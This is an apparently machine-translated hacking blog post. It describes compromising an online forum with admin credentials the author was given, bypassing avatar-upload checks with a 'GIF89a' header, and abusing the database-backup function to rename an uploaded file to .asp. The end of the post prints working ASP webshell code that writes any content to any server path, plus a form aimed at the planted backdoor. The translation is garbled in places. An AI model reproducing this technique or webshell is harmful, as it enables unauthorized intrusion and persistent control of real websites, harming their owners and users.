You can also play on the Internet backend.

Author: 9 Xiao Source: http://www.wrsky.com

I have met such a forum before, but I only completed the previous operations, but I don't know what to do with X. I am still a little clever guy, haha)
This afternoon, a guy from the powers group gave me the background permission for an even online forum and asked me if I could get a webshell. after entering the background, I prepared to back up the database and use webshell. I found the forum Forum.
The upload permission of is not enabled. After the permission is enabled, use the administrator ID to post and upload the file. *. the uploaded file is deleted. Start with uploading the Avatar and find that the ASP suffix is changed to the same as that of GIF, indicating that the type is incorrect.
So I gave up my idea of uploading and thought about the database on the forum. I suddenly thought that there was an IP database in the data folder. It seems that I had some hope. In IP address management, I inserted the smallest horse and backed up it.
After being. asp, the system prompts that the Microsoft VBScript compiler error '800a0408' is invalid.
BBS/9xiao. asp, row 3706
^ Txq
Failed, depressed for a long time, think of testing fox.wrsky.com's 7.1 back-end backup with more than 7.0 prompts to verify whether the backup file is an mdb database at that time
First, I thought of inserting the minimal horse into a database, modifying the GIF suffix and uploading it, And then backing up the ASP Suffix in the background. The experiment was successful. 7.0. The file class to be backed up is not detected during Backup.
Type, even think of other directories on the station, put several key. the ASP file is backed up to the GIF suffix, And the DNS database on the website is obtained in IE browsing. It can be seen that admin is MD5 encrypted,
I always do not advocate brute-force cracking. I think I have returned to the upload Avatar and received several business calls. My ideas have gradually become clearer. I remembered that I was demonstrating a website upload with Firefox yesterday.
Gif89a is added to the first line. This is the GIF signature. If you have a good idea, you can definitely break through the verification on the upload end.
Add gif89a in a row, change the suffix .gif, upload the Avatar with the administrator ID, and back up 9xiao. asp in the root directory of the Forum. The browser browses the portrait, how does the depressed display red X, and use the Internet Express
Use NotePad to open <form action = ''method = post> the <font
Color = Red> absolute path (including file name: for example, D:/web/X. asp): </font> <input type = text name = syfdpath width = 32
Size = 50> <br> absolute path of this file D:/*******/Web *****/www/BBS/9xiao. ASP <br> content of the input horse: <textarea name = cyfddata Cols = 80 rows = 10
Width = 32> </textarea> <input type = submit
Value = save> </form> change to. html, and paste the familiar interface to save the absolute path of the file (including the file name, such as D:/web/X. asp ):
Absolute path D:/*******/Web *****/www/BBS/9xiao. asp
The code is executed. in <form action = ''method = post>'', enter 9xiao. asp url, the absolute path to save the file (including the file name, such as D:/web/X. ASP): enter a box
Enter D:/********/Web *****/www/BBS/9xiao2. asp horse and enter "Firefox, hello !" Click Submit and browse.
Gif89a
<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Createobject ("scripting. FileSystemObject") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "<font color = Red> Save success! </Font> "%>
<% Else %>
<% Response. Write "<font color = Red> Save unsuccess! </Font> "%>
<% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write "<form action ='' method = post> "%>
<% Response. Write "<font color = Red> absolute path of the file to be saved (including file name: such as D:/web/X. asp): </font>" %>
<% Response. Write "<input type = text name = syfdpath width = 32 size = 50>" %>
<% Response. Write "<br>" %>
<% Response. Write "absolute path of this file" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% Response. Write "<br>" %>
<% Response. Write "content of the input horse:" %>
<% Response. Write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %>
<% Response. Write "<input type = submit value = save>" %>
<% Response. Write "</form>" %>

<Form action = '_ blank> http: // www. *****. Net/BBS/9xiao. asp' method = post> Save the <font
Color = Red> absolute path (including file name: for example, D:/web/X. asp): </font> <input type = text name = syfdpath width = 32
Size = 50> <br> absolute path D:/virtualhost/web79354/www/BBS/9xiao. ASP <br> content of the input horse: <textarea name = cyfddata Cols = 80 rows = 10
Width = 32> </textarea> <input type = submit value = save> </form>